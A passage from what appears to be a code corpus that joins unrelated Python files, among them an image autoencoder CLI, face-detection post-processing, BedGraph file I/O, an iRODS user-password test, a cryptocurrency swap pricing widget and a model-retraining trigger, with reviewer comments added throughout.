            # tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='relu', padding='same'),
            tf.keras.layers.Conv2D(3, kernel_size=(3,3),strides=2, activation='sigmoid', padding='same')])

    def call(self, x):
        # Standard autoencoder forward pass: encode, then decode.
        encoded = self.encoder(x)
        decoded = self.decoder(encoded)
        return decoded
def remove_alpha(img: np.ndarray) -> np.ndarray:
    """Drop the alpha channel from a batched RGBA image.

    Args:
        img: array of shape (1, H, W, 4) — a batch holding one RGBA image.

    Returns:
        Array of shape (1, H, W, 3) containing only the RGB channels.
    """
    # Annotation fix: `np` is the module object, not a type; the parameter
    # and return value are np.ndarray.
    return np.array([img[0, :, :, :3]])
def display_sample(img: np.ndarray):
    """Show the first image of the batch; blocks until the window closes."""
    plt.imshow(img[0])
    plt.show()
def Get_Img(path: str) -> np.ndarray:
    """Load an image, resize it to 128x128, scale to [0, 1] and batch it.

    Args:
        path: path of the image file to load.

    Returns:
        Array of shape (1, 128, 128, 3), values in [0, 1].
        NOTE(review): grayscale (H, W) inputs are not handled — confirm
        callers only pass RGB/RGBA images.
    """
    # Annotation fix: the return type is np.ndarray, not the np module.
    img_2 = np.asarray(PIL.Image.open(path).resize((128, 128)))
    img_2 = np.array([img_2])
    img_2 = img_2 / 255
    print("shape: ", img_2.shape)
    # Drop the alpha channel from RGBA inputs.
    if img_2.shape[-1] > 3:
        img_2 = remove_alpha(img_2)
    return img_2
def Save(imgarray: np.ndarray, path: str) -> None:
    """Write the image array to <path>/output.png via matplotlib."""
    # method 1
    matimage.imsave(os.path.join(path,"output.png"),imgarray)
    #method 2 (not working)
    # imgarray = imgarray * 255
    # imgarray = imgarray.astype(int)
    # imgarray = PIL.Image.fromarray(imgarray)
    # imgarray.save(os.path.join(path,"output.png"))
def main():
    """CLI entry point: run the pretrained autoencoder on a single image."""
    default_encoder_model = 'res/python/res/SavedModels/pretrained_model_encoder.h5'
    default_decoder_model = 'res/python/res/SavedModels/pretrained_model_decoder.h5'
    image_output_dir = "res/python/res/data/output"
    parser = argparse.ArgumentParser()
    # NOTE(review): type=bool is a known argparse pitfall — bool("False")
    # is True, so any non-empty value enables the flag. Likewise --display
    # receives a *string*, so "--display False" is truthy. Consider
    # action='store_true' for both (left unchanged to preserve the CLI).
    parser.add_argument('--use_model', type=bool, default=True, help='Use default model?')
    parser.add_argument("--img", help=" The relative path of the targeted image to this file.",
                        default= "None")
    parser.add_argument("--display", help=" Display result", default = False)
    parser.add_argument("--output_dir", help="The output directory.", default = None)
    args = parser.parse_args()
    if(args.use_model and args.img != "None"):
        print("Using pretrained model.")
    else:
        # No model or no image: nothing to do.
        print("No Pretrained Model Selected")
        return
    pixelazer = ConvolutionalAutoencoder()
    # Loading Pretrained Model
    pixelazer.encoder = tf.keras.models.load_model(default_encoder_model)
    pixelazer.decoder = tf.keras.models.load_model(default_decoder_model)
    pixelazer.compile(optimizer= "adam", loss=tf.keras.losses.MeanSquaredError())
    output = pixelazer.predict(Get_Img(args.img))
    if(args.display):
        display_sample(output)
    if(args.output_dir != None):
        Save(output[0],args.output_dir)
    print("Done")
    exit()
# Script entry point.
if __name__ == '__main__':
    main()
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""post process for 310 inference"""
import os
import numpy as np
from src.model_utils.config import config
from dependency.centernet.src.lib.detectors.base_detector import CenterFaceDetector
from dependency.evaluate.eval import evaluation
# Maps a WIDER FACE event index (as a string) to its event directory name;
# used to mirror the dataset's folder layout when writing detection results.
dct_map = {'16': '16--Award_Ceremony', '26': '26--Soldier_Drilling', '29': '29--Students_Schoolkids',
           '30': '30--Surgeons', '52': '52--Photographers', '59': '59--people--driving--car', '44': '44--Aerobics',
           '50': '50--Celebration_Or_Party', '19': '19--Couple', '38': '38--Tennis', '37': '37--Soccer',
           '48': '48--Parachutist_Paratrooper', '53': '53--Raid', '6': '6--Funeral', '40': '40--Gymnastics',
           '5': '5--Car_Accident', '39': '39--Ice_Skating', '47': '47--Matador_Bullfighter', '61': '61--Street_Battle',
           '56': '56--Voter', '18': '18--Concerts', '1': '1--Handshaking', '2': '2--Demonstration',
           '28': '28--Sports_Fan', '4': '4--Dancing', '43': '43--Row_Boat', '49': '49--Greeting', '12': '12--Group',
           '24': '24--Soldier_Firing', '33': '33--Running', '11': '11--Meeting', '36': '36--Football',
           '45': '45--Balloonist', '15': '15--Stock_Market', '51': '51--Dresses', '7': '7--Cheering',
           '32': '32--Worker_Laborer', '58': '58--Hockey', '35': '35--Basketball', '22': '22--Picnic',
           '55': '55--Sports_Coach_Trainer', '3': '3--Riot', '23': '23--Shoppers', '34': '34--Baseball',
           '8': '8--Election_Campain', '9': '9--Press_Conference', '17': '17--Ceremony', '13': '13--Interview',
           '20': '20--Family_Group', '25': '25--Soldier_Patrol', '42': '42--Car_Racing', '0': '0--Parade',
           '14': '14--Traffic', '41': '41--Swimming', '46': '46--Jockey', '10': '10--People_Marching',
           '54': '54--Rescue', '57': '57--Angler', '31': '31--Waiter_Waitress', '27': '27--Spa', '21': '21--Festival'}
def cal_acc(result_path, label_file, meta_file, save_path):
    """Decode Ascend-310 inference outputs into WIDER-format result files
    and run the evaluation.

    Args:
        result_path: directory holding the per-image *_0.bin .. *_4.bin
            network output files.
        label_file: ground-truth label file passed to evaluation().
        meta_file: directory containing name_list.npy and meta_list.npy.
        save_path: output root; one sub-directory per WIDER event.
    """
    detector = CenterFaceDetector(config, None)
    # Bug fix: the per-event sub-directories were only created when
    # save_path itself did not exist, so a pre-existing (e.g. empty)
    # save_path made the open() below fail. Ensure them unconditionally.
    for im_dir in dct_map.values():
        out_path = os.path.join(save_path, im_dir)
        if not os.path.exists(out_path):
            os.makedirs(out_path)
    name_list = np.load(os.path.join(meta_file, "name_list.npy"), allow_pickle=True)
    meta_list = np.load(os.path.join(meta_file, "meta_list.npy"), allow_pickle=True)
    for num, im_name in enumerate(name_list):
        meta = meta_list[num]
        # The five .bin files per image are the raw network outputs.
        output_hm = np.fromfile(os.path.join(result_path, im_name) + "_0.bin", dtype=np.float32).reshape((1, 200))
        output_wh = np.fromfile(os.path.join(result_path, im_name) + "_1.bin", dtype=np.float32).reshape(
            (1, 2, 208, 208))
        output_off = np.fromfile(os.path.join(result_path, im_name) + "_2.bin", dtype=np.float32).reshape(
            (1, 2, 208, 208))
        output_kps = np.fromfile(os.path.join(result_path, im_name) + "_3.bin", dtype=np.float32).reshape(
            (1, 10, 208, 208))
        topk_inds = np.fromfile(os.path.join(result_path, im_name) + "_4.bin", dtype=np.int32).reshape((1, 200))
        reg = output_off if config.reg_offset else None
        detections = []
        for scale in config.test_scales:
            dets = detector.centerface_decode(output_hm, output_wh, output_kps, reg=reg, opt_k=config.K,
                                              topk_inds=topk_inds)
            dets = detector.post_process(dets, meta, scale)
            detections.append(dets)
        dets = detector.merge_outputs(detections)
        # The event index is the prefix of the image name (e.g. "16_...").
        index = im_name.split('_')[0]
        im_dir = dct_map.get(index)
        # WIDER result format: image path, detection count, then one
        # "x y w h score" line per detection.
        with open(save_path + '/' + im_dir + '/' + im_name + '.txt', 'w') as f:
            f.write('{:s}\n'.format('%s/%s.jpg' % (im_dir, im_name)))
            f.write('{:d}\n'.format(len(dets)))
            for b in dets[1]:
                x1, y1, x2, y2, s = b[0], b[1], b[2], b[3], b[4]
                f.write('{:.1f} {:.1f} {:.1f} {:.1f} {:.3f}\n'.format(x1, y1, (x2 - x1 + 1), (y2 - y1 + 1), s))
        # Typo fix: "image_nameL" -> "image_name:".
        print(f"no.[{num}], image_name: {im_name}")
    evaluation(save_path, label_file)
# Entry point: all paths come from the shared model_utils config.
if __name__ == '__main__':
    cal_acc(config.result_path, config.label_file, config.meta_file, config.save_path)
| 4,905 | 1,958 |
"""
2018.Jan
@author: Tomoki Emmei
description: program to show multiplication and addition table
"""
import sys #read command line argument
# Display the multiplication table
def kakezan(a, b):
    """Print an a-column by b-row multiplication table and return it.

    Row i (1-based) holds i*j for j = 1..a.
    """
    table = []
    for i in range(1, b + 1):
        row = []
        for j in range(1, a + 1):
            print(i * j, end=' ')
            row.append(i * j)
        print()  # newline after each row
        table.append(row)
    return table
# Display the addition table
def tashizan(a, b):
    """Print an a-column by b-row addition table and return it.

    Row i (1-based) holds i+j for j = 1..a.
    """
    table = []
    for i in range(1, b + 1):
        row = []
        for j in range(1, a + 1):
            print(i + j, end=' ')
            row.append(i + j)
        print()  # newline after each row
        table.append(row)
    return table
def main():
    """Entry point: argv[1] chooses 'm' (multiplication) or 'a' (addition)."""
    # Bug fix: guard against a missing argument instead of crashing with
    # IndexError when the script is run without one.
    if len(sys.argv) < 2:
        print('Caution: argument is a or m')
        return
    args = sys.argv[1]
    if args == 'm':
        # load table dimensions from stdin
        x = int(input('x: '))
        y = int(input('y: '))
        kakezan(x, y)
    elif args == "a":
        x = int(input('x: '))
        y = int(input('y: '))
        tashizan(x, y)
    else:
        print('Caution: argument is a or m')  # exception handling
# Script entry point.
if __name__ == '__main__':
    main()
| 1,231 | 440 |
from typing import Callable
import numpy as np
from iliad.integrators.states.lagrangian_leapfrog_state import LagrangianLeapfrogState
from iliad.integrators.fields import riemannian
from iliad.linalg import solve_psd
from odyssey.distribution import Distribution
class RiemannianLeapfrogState(LagrangianLeapfrogState):
    """The Riemannian leapfrog state uses the Fisher information matrix to provide
    a position-dependent Riemannian metric. As such, computing the gradients of
    the Hamiltonian requires higher derivatives of the metric, which vanish in
    the Euclidean case.
    """

    def __copy__(self):
        # Deep-ish copy: every cached array is .copy()'d so mutating the
        # clone cannot corrupt this state.
        # NOTE(review): assumes all of these attributes are numpy arrays
        # (scalars would lack .copy()) and have been populated by a prior
        # update() — confirm callers never copy a fresh state.
        state = RiemannianLeapfrogState(self.position.copy(), self.momentum.copy())
        state.log_posterior = self.log_posterior.copy()
        state.grad_log_posterior = self.grad_log_posterior.copy()
        state.velocity = self.velocity.copy()
        state.metric = self.metric.copy()
        state.inv_metric = self.inv_metric.copy()
        state.sqrtm_metric = self.sqrtm_metric.copy()
        state.logdet_metric = self.logdet_metric.copy()
        state.jac_metric = self.jac_metric.copy()
        state.grad_logdet_metric = self.grad_logdet_metric.copy()
        state.force = self.force.copy()
        return state

    def update(self, distr: Distribution):
        """Refresh cached quantities, then derive velocity and force from
        the (parent-updated) metric terms."""
        super().update(distr)
        self.velocity = riemannian.velocity(self.inv_metric, self.momentum)
        self.force = riemannian.force(self.velocity, self.grad_log_posterior, self.jac_metric, self.grad_logdet_metric)
| 1,524 | 469 |
# Copyright (c) 2013, University of Liverpool
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Author : Jerome Fuselier
#
from irods import *
# Test fixture: temporary user name and the password we try to set.
# (Python 2 script — print statements are intentional.)
USER = "testModify"
PW = "1Password"

if __name__ == "__main__":
    status, myEnv = getRodsEnv()
    # This have to be a user in the rodsadmin group
    conn, errMsg = rcConnect(myEnv.rodsHost, myEnv.rodsPort,
                             myEnv.rodsUserName, myEnv.rodsZone)
    status = clientLogin(conn)
    # Create a user with the name and the group
    user = createUser(conn, USER, "rodsuser")
    delete_user_after = True
    if not user:
        delete_user_after = False  # If the user exists we won't delete it
        user = getUser(conn, USER)
    #print setPassword(conn, user.getName(), PW)
    print "status for modification: ", user.setPassword(PW)
    conn.disconnect()
    # Test connection for our modified user
    # NOTE(review): host/port/zone are hard-coded here instead of taken
    # from myEnv — confirm this matches the test deployment.
    conn, errMsg = rcConnect("localhost", 1247, USER, "tempZone")
    status = clientLoginWithPassword(conn, PW)
    print "Status for the connection with our modified user %s: %d" % (USER, status)
    conn.disconnect()
    if delete_user_after:
        # Clean up: reconnect as admin and remove the temporary user.
        conn, errMsg = rcConnect(myEnv.rodsHost, myEnv.rodsPort,
                                 myEnv.rodsUserName, myEnv.rodsZone)
        status = clientLogin(conn)
        deleteUser(conn, USER)
        conn.disconnect()
| 2,002 | 624 |
# Copyright 2018 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes for reading and writing BedGraph files.
The BedGraph format is described at
https://genome.ucsc.edu/goldenpath/help/bedgraph.html
API for reading:
```python
from nucleus.io import bedgraph
# Iterate through all records.
with bed.BedGraphReader(input_path) as reader:
for record in reader:
print(record)
```
where `record` is a `nucleus.genomics.v1.BedGraphRecord` protocol buffer.
API for writing:
```python
from nucleus.io import bedgraph
from nucleus.protos import bedgraph_pb2
# records is an iterable of nucleus.genomics.v1.BedGraphRecord protocol buffers.
records = ...
# Write all records to the desired output path.
with bed.BedGraphWriter(output_path) as writer:
for record in records:
writer.write(record)
```
For both reading and writing, if the path provided to the constructor contains
'.tfrecord' as an extension, a `TFRecord` file is assumed and attempted to be
read or written. Otherwise, the filename is treated as a true BedGraph file.
Files that end in a '.gz' suffix cause the file to be treated as compressed
(with BGZF if it is a BedGraph file, and with gzip if it is a TFRecord file).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from nucleus.io import genomics_reader
from nucleus.io import genomics_writer
from nucleus.io.python import bedgraph_reader
from nucleus.io.python import bedgraph_writer
from nucleus.protos import bedgraph_pb2
class NativeBedGraphReader(genomics_reader.GenomicsReader):
  """Class for reading from native BedGraph files.

  Most users will want to use BedGraphReader instead, because it dynamically
  dispatches between reading native BedGraph files and TFRecord files based on
  the filename's extension.
  """

  def __init__(self, input_path, num_fields=0):
    """Initializes a NativeBedGraphReader.

    Args:
      input_path: string. A path to a resource containing BedGraph records.
      num_fields: int. The number of fields to read in the BedGraph. If unset or
        set to zero, all fields in the input are read.
        NOTE(review): this argument is currently accepted but never
        forwarded to the underlying reader — confirm whether from_file
        should receive it.
    """
    super(NativeBedGraphReader, self).__init__()
    bedgraph_path = input_path.encode('utf8')
    self._reader = bedgraph_reader.BedGraphReader.from_file(bedgraph_path)

  def query(self):
    """Returns an iterator for going through the records in the region.

    NOTE: This function is not currently implemented by NativeBedGraphReader
    though it could be implemented for sorted, tabix-indexed BedGraph files.
    """
    raise NotImplementedError('Can not currently query a BedGraph file')

  def iterate(self):
    """Returns an iterable of BedGraphRecord protos in the file."""
    return self._reader.iterate()

  def __exit__(self, exit_type, exit_value, exit_traceback):
    # Delegate context-manager cleanup to the native reader.
    self._reader.__exit__(exit_type, exit_value, exit_traceback)
class BedGraphReader(genomics_reader.DispatchingGenomicsReader):
  """Class for reading BedGraphRecord protos from BedGraph or TFRecord files."""

  def _native_reader(self, input_path, **kwargs):
    # Used by the dispatching base class for non-TFRecord paths.
    return NativeBedGraphReader(input_path, **kwargs)

  def _record_proto(self):
    # Proto type used when reading TFRecord-encoded records.
    return bedgraph_pb2.BedGraphRecord
class NativeBedGraphWriter(genomics_writer.GenomicsWriter):
  """Class for writing to native BedGraph files.

  Most users will want BedGraphWriter, which will write to either native
  BedGraph files or TFRecord files, based on the output filename's extension.
  """

  def __init__(self, output_path, header=None):
    """Initializer for NativeBedGraphWriter.

    Args:
      output_path: str. The path to which to write the BedGraph file.
      header: optional header object. NOTE(review): accepted but currently
        unused — confirm whether to_file should receive it.
    """
    super(NativeBedGraphWriter, self).__init__()
    self._writer = bedgraph_writer.BedGraphWriter.to_file(output_path)

  def write(self, proto):
    """Writes one BedGraphRecord proto to the file."""
    self._writer.write(proto)

  def __exit__(self, exit_type, exit_value, exit_traceback):
    # Delegate context-manager cleanup to the native writer.
    self._writer.__exit__(exit_type, exit_value, exit_traceback)
class BedGraphWriter(genomics_writer.DispatchingGenomicsWriter):
  """Class for writing BedGraphRecord protos to BedGraph or TFRecord files."""

  def _native_writer(self, output_path):
    # Used by the dispatching base class for non-TFRecord paths.
    return NativeBedGraphWriter(output_path)
| 4,727 | 1,404 |
from functools import partial
import math
from electroncash.i18n import _
from electroncash.address import Address
import electroncash.web as web
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrtextedit import ShowQRTextEdit
from electroncash import bchmessage
from electroncash import openswap
from electroncash.util import format_satoshis_plain_nofloat, get_satoshis_nofloat
from electroncash.openswap import cryptos, crypto_list_by_bytes, crypto_list_by_str
def invert(x):
    """Return 1/x, with division by zero mapped to a signed infinity."""
    try:
        reciprocal = 1. / x
    except ZeroDivisionError:
        # Emulate IEEE-754 semantics: 1/(+0) -> +inf, 1/(-0) -> -inf,
        # taking the sign from x instead of raising.
        reciprocal = math.copysign(math.inf, x)
    return reciprocal
class PriceInfoBox(QGroupBox):
# how many significant figures to use in price calculations
# cryptocurrency amounts always use full precision
price_sigfigs = 6
# Dialog for creating / editing / viewing OpenSwap offers
    # Dialog for creating / editing / viewing OpenSwap offers
    def __init__(self, parent, editable=True):
        """Build the pricing group box.

        Args:
            parent: owning widget.
            editable: when False, the crypto selectors are disabled and the
                'by price' checkboxes are hidden (view-only mode).
        """
        self.parent = parent
        self.editable = bool(editable)
        QGroupBox.__init__(self, _("Pricing"), parent=parent)
        layout = QGridLayout(self)
        # --- "Want" row: amount, currency, optional by-price mode -------
        layout.addWidget(QLabel(_("Want")), 1, 0)
        hbox = QHBoxLayout()
        layout.addLayout(hbox, 1, 1)
        self.want_amount_e = QLineEdit()
        self.want_amount_e.textEdited.connect(self.amount_edited)
        hbox.addWidget(self.want_amount_e)
        self.want_crypto_cb = QComboBox()
        self.want_crypto_cb.addItems(crypto_list_by_str)
        hbox.addWidget(self.want_crypto_cb)
        self.want_price_cb = QCheckBox(_("by price"))
        self.want_price_cb.clicked.connect(partial(self.clicked_byprice, 1))
        hbox.addWidget(self.want_price_cb)
        if not self.editable:
            self.want_price_cb.setHidden(True)
            self.want_crypto_cb.setDisabled(True)
        hbox.addStretch(1)
        # --- "Give" row: mirror of the Want row -------------------------
        layout.addWidget(QLabel(_('Give')), 2, 0)
        hbox = QHBoxLayout()
        layout.addLayout(hbox, 2, 1)
        self.give_amount_e = QLineEdit()
        self.give_amount_e.textEdited.connect(self.amount_edited)
        hbox.addWidget(self.give_amount_e)
        self.give_crypto_cb = QComboBox()
        self.give_crypto_cb.addItems(crypto_list_by_str)
        hbox.addWidget(self.give_crypto_cb)
        self.give_price_cb = QCheckBox(_("by price"))
        self.give_price_cb.clicked.connect(partial(self.clicked_byprice, 2))
        hbox.addWidget(self.give_price_cb)
        if not self.editable:
            self.give_price_cb.setHidden(True)
            self.give_crypto_cb.setDisabled(True)
        hbox.addStretch(1)
        # --- Price rows: the two reciprocal prices ----------------------
        layout.addWidget(QLabel(_('Price')), 3,0)
        vbox = QVBoxLayout()
        layout.addLayout(vbox, 3, 1)
        hbox = QHBoxLayout()
        vbox.addLayout(hbox)
        hbox.addStretch(1)
        self.price1_e = QLineEdit()
        self.price1_e.textEdited.connect(partial(self.price_edited,1))
        hbox.addWidget(self.price1_e)
        self.price1_label = QLabel()
        hbox.addWidget(self.price1_label)
        hbox = QHBoxLayout()
        vbox.addLayout(hbox)
        hbox.addStretch(1)
        self.price2_e = QLineEdit()
        self.price2_e.textEdited.connect(partial(self.price_edited,2))
        hbox.addWidget(self.price2_e)
        self.price2_label = QLabel()
        hbox.addWidget(self.price2_label)
        # Which price field the user edited last; it wins when recomputing.
        self.primaryprice = self.price1_e
        self.update_cryptos()
        self.update_editable()
        self.update_amounts()
        self.want_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
        self.give_crypto_cb.currentIndexChanged[int].connect(self.update_cryptos)
    def clicked_byprice(self, i, checked):
        # Slot for the two "by price" checkboxes (i=1 -> "want", i=2 -> "give").
        # Only one of the two may be checked at a time, so checking one
        # unchecks the other, then amounts and read-only state are refreshed.
        if not checked:
            pass
        elif i == 1:
            self.give_price_cb.setChecked(False) # make sure other is unchecked
            self.price1_e.setFocus(Qt.MouseFocusReason)
        elif i == 2:
            self.want_price_cb.setChecked(False) # make sure other is unchecked
            # NOTE(review): this branch also focuses price1_e; possibly a
            # copy-paste from the i==1 branch (price2_e?) -- confirm intent.
            self.price1_e.setFocus(Qt.MouseFocusReason)
        self.update_amounts()
        self.update_editable()
def format_price(self, p):
return '%.*g'%(self.price_sigfigs, p)
    def amount_edited(self, s):
        # Slot for textEdited on either amount field.  The new text `s` is
        # unused: amounts are re-read from the widgets in update_amounts().
        self.update_amounts()
def price_edited(self, n, s):
if n == 1:
self.primaryprice = self.price1_e
else:
self.primaryprice = self.price2_e
self.update_amounts()
    def update_amounts(self,):
        # Update the other two dependent amounts based on user-provided ones.
        # This uses floats.
        #
        # Two modes:
        #   * "by price" (either checkbox checked): one amount plus the price
        #     drives the other amount; the two price boxes are kept mutually
        #     inverse (price2 = 1/price1), driven by whichever was edited last.
        #   * neither checked: both amounts drive the displayed prices.
        # The bare excepts intentionally swallow parse errors (empty/invalid
        # text, and presumably division-by-zero inside invert()) and blank
        # the dependent field instead -- TODO confirm invert() semantics.
        wbyprice = self.want_price_cb.isChecked()
        gbyprice = self.give_price_cb.isChecked()
        if wbyprice or gbyprice:
            if self.primaryprice is self.price1_e:
                try:
                    price = float(self.price1_e.text())
                    iprice = invert(price)
                except:
                    self.price2_e.setText('')
                    price = None
                else:
                    self.price2_e.setText(self.format_price(iprice))
            else:
                try:
                    iprice = float(self.price2_e.text())
                    price = invert(iprice)
                except:
                    self.price1_e.setText('')
                    price = None
                else:
                    self.price1_e.setText(self.format_price(price))
            if wbyprice:
                # want = price * give; 1e8 suggests a satoshi-unit conversion
                # (format_satoshis_plain_nofloat) -- confirm against helper.
                try:
                    a = price * 1e8 * float(self.give_amount_e.text())
                    self.want_amount_e.setText(format_satoshis_plain_nofloat(a))
                except:
                    self.want_amount_e.setText('')
            else:
                try:
                    a = iprice * 1e8 * float(self.want_amount_e.text())
                    self.give_amount_e.setText(format_satoshis_plain_nofloat(a))
                except:
                    self.give_amount_e.setText('')
        else:
            # Amount-driven mode: derive both price displays from the ratio.
            try:
                wa = float(self.want_amount_e.text())
                ga = float(self.give_amount_e.text())
            except:
                self.price1_e.setText('')
                self.price2_e.setText('')
            else:
                self.price1_e.setText(self.format_price(wa*invert(ga)))
                self.price2_e.setText(self.format_price(ga*invert(wa)))
def update_editable(self,):
""" Based on the state of 'by price' checkboxes, update read_only-ness
"""
if not self.editable:
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
elif self.give_price_cb.isChecked():
self.give_amount_e.setReadOnly(True)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(False)
self.price2_e.setReadOnly(False)
elif self.want_price_cb.isChecked():
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(True)
self.price1_e.setReadOnly(False)
self.price2_e.setReadOnly(False)
else:
self.give_amount_e.setReadOnly(False)
self.want_amount_e.setReadOnly(False)
self.price1_e.setReadOnly(True)
self.price2_e.setReadOnly(True)
def update_cryptos(self,):
tick1 = self.want_crypto_cb.currentText()
tick2 = self.give_crypto_cb.currentText()
self.price1_label.setText(tick1 + '/' + tick2)
self.price2_label.setText(tick2 + '/' + tick1)
| 7,625 | 2,505 |
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import logging
from commons.object_saving.object_saver import ObjectSaver
from commons.triggering_training import abstract_triggering_training
logger = logging.getLogger("analyzerApp.retraining_defect_type_triggering")
class RetrainingDefectTypeTriggering(abstract_triggering_training.AbstractTrainingTrigger):
    """Decides when the defect-type model should be retrained.

    Two per-project counters are persisted via ObjectSaver: the total number
    of logs with defect types, and the number seen since the last training
    run.  Training triggers once both counters reach their thresholds.
    """

    # Name of the persisted per-project object holding the counters.
    TRIGGER_INFO_OBJECT = "defect_type_trigger_info"

    def __init__(self, app_config, start_number=100, accumulated_difference=100):
        self.object_saver = ObjectSaver(app_config)
        self.start_number = start_number
        self.accumulated_difference = accumulated_difference

    def remove_triggering_info(self, train_info):
        """Delete the stored trigger counters for the project."""
        self.object_saver.remove_project_objects(
            train_info["project_id"], [self.TRIGGER_INFO_OBJECT])

    def get_triggering_info(self, train_info):
        """Load the trigger counters (a dict) for the project."""
        return self.object_saver.get_project_object(
            train_info["project_id"], self.TRIGGER_INFO_OBJECT, using_json=True)

    def save_triggering_info(self, trigger_info, train_info):
        """Persist the trigger counters for the project."""
        self.object_saver.put_project_object(
            trigger_info, train_info["project_id"],
            self.TRIGGER_INFO_OBJECT, using_json=True)

    def clean_defect_type_triggering_info(self, train_info, num_logs_with_defect_types):
        """Reset the since-training counter after a training run."""
        trigger_info = self.get_triggering_info(train_info)
        trigger_info["num_logs_with_defect_types_since_training"] = 0
        trigger_info["num_logs_with_defect_types"] = num_logs_with_defect_types
        self.save_triggering_info(trigger_info, train_info)

    def should_model_training_be_triggered(self, train_info):
        """Add this batch to both counters, persist them, and test thresholds."""
        trigger_info = self.get_triggering_info(train_info)
        new_log_count = train_info["num_logs_with_defect_types"]
        for counter_key in ("num_logs_with_defect_types",
                            "num_logs_with_defect_types_since_training"):
            trigger_info[counter_key] = trigger_info.get(counter_key, 0) + new_log_count
        self.save_triggering_info(trigger_info, train_info)
        return (trigger_info["num_logs_with_defect_types"] >= self.start_number
                and trigger_info["num_logs_with_defect_types_since_training"]
                >= self.accumulated_difference)
| 2,906 | 912 |
from __future__ import print_function
from cloudmesh.shell.command import command
from cloudmesh.shell.command import PluginCommand
from cloudmesh.docopts_example.api.manager import Manager
from cloudmesh.common.console import Console
from cloudmesh.common.util import path_expand
from pprint import pprint
from cloudmesh.common.debug import VERBOSE
class Docopts_exampleCommand(PluginCommand):
    """Cloudmesh shell plugin demonstrating docopt-based argument parsing."""

    # noinspection PyUnusedLocal
    @command
    def do_docopts_example(self, args, arguments):
        """
        ::

          Usage:
                docopts_example --name
                docopts_example list

          This is an example of how to use docopts.

          Arguments:
              NAME   the users name

          Options:
              -n     specify the name
        """
        # The docstring above is parsed by @command/docopt at runtime; its
        # Usage/Options text is program behavior, not mere documentation.
        # NOTE(review): Usage declares --name as a bare flag, so
        # arguments['--name'] is presumably True/False rather than a name
        # string -- confirm against the cloudmesh @command decorator.
        arguments.NAME = arguments['--name'] or None
        VERBOSE(arguments)  # debug-dump of the parsed arguments
        m = Manager()
        if arguments.NAME:
            print("Hello,", m.list(path_expand(arguments.NAME)), "this is an example of docopts")
        else:
            print("This is an example of docopts")
from typing import *
import unittest
import contextlib
import os
import sys
import tempfile
from dvg.dvg import prune_overlapped_paragraphs, expand_file_iter
@contextlib.contextmanager
def back_to_curdir():
    """Context manager restoring the current working directory on exit."""
    saved_cwd = os.getcwd()
    try:
        yield
    finally:
        os.chdir(saved_cwd)
def touch(file_name: str):
    """Create (or truncate) *file_name* as an empty file."""
    with open(file_name, "w"):
        pass
class DvgUtilFuncsTest(unittest.TestCase):
    """Unit tests for dvg helper functions."""

    def test_prune_overlapped_paragraphs(self):
        # Each item is (score, total, (begin, end), lines).  Paragraphs whose
        # (begin, end) line ranges overlap compete; the expectation is that
        # the higher-scored one survives.
        lines = ["a b", "c d", "e f", "b a"]

        # Middle paragraph scores highest and overlaps both neighbors.
        spps = [
            (0.1, 4, (0, 2), lines),
            (0.3, 4, (1, 3), lines),
            (0.2, 4, (2, 4), lines),
        ]
        actual = prune_overlapped_paragraphs(spps)
        expected = [spps[1]]
        self.assertEqual(actual, expected)

        # First paragraph scores highest; overlap pruning removes the rest.
        spps = [
            (0.3, 4, (0, 2), lines),
            (0.2, 4, (1, 3), lines),
            (0.1, 4, (2, 4), lines),
        ]
        actual = prune_overlapped_paragraphs(spps)
        expected = [spps[0]]
        self.assertEqual(actual, expected)

        # (0, 2) and (2, 4) do not overlap each other, so both survive.
        spps = [
            (0.3, 4, (0, 2), lines),
            (0.1, 4, (1, 3), lines),
            (0.2, 4, (2, 4), lines),
        ]
        actual = prune_overlapped_paragraphs(spps)
        expected = [spps[0], spps[2]]
        self.assertEqual(actual, expected)

    def test_expand_file_iter(self):
        with tempfile.TemporaryDirectory() as tempdir:
            with back_to_curdir():
                os.chdir(tempdir)
                # Layout: ./a, ./b, ./D/c
                file_a = os.path.join("a")
                touch(file_a)
                file_b = os.path.join("b")
                touch(file_b)
                os.mkdir("D")
                file_Dc = os.path.join("D", "c")
                touch(file_Dc)

                # Explicit file names pass through unchanged, preserving order.
                file_list = list(expand_file_iter(["a"]))
                self.assertSequenceEqual(file_list, ["a"])
                file_list = list(expand_file_iter(["a", "b"]))
